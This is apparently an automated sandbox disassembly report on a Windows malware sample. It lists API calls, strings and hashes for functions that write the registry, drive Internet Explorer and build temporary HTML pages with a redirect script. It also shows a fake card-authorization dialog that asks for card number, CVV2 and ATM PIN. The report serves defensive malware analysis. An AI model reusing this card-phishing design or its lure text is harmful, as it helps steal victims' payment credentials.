                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph (rendered image omitted; legend: Executed / Not Executed)
                            • Blocks and edges: 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph (rendered image omitted; legend: Executed / Not Executed)
                            • Blocks and edges: 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph (rendered image omitted; legend: Executed / Not Executed)
                            • Blocks and edges: 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 92 4079e1-4079e3 82->92 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 89 4079b1 85->89 90 4079ab 85->90 86->80 87->82 91 4079ca-4079cd 87->91 89->82 90->85 91->82 93 4079c2 91->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph (rendered image omitted; legend: Executed / Not Executed)
                            • Blocks and edges: 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph (rendered image omitted; legend: Executed / Not Executed)
                            • Blocks and edges: 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

(Control-flow graph image not rendered in this export. Recoverable structure from the graph data: entry block 0040570C-00405743 calls 004079E4 and GetTempPathA; a short loop at 00405746-0040574B; block 0040574D-00405796 calls 004015EA, strcat, sprintf and rand; from 00405798 to 00405B85 a chain of rand-gated blocks that each either strcat/sprintf the next page fragment or optionally append filler; exit block 00405B88-00405C08 calls strcat, CreateFileA, lstrlenA, WriteFile and CloseHandle.)
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
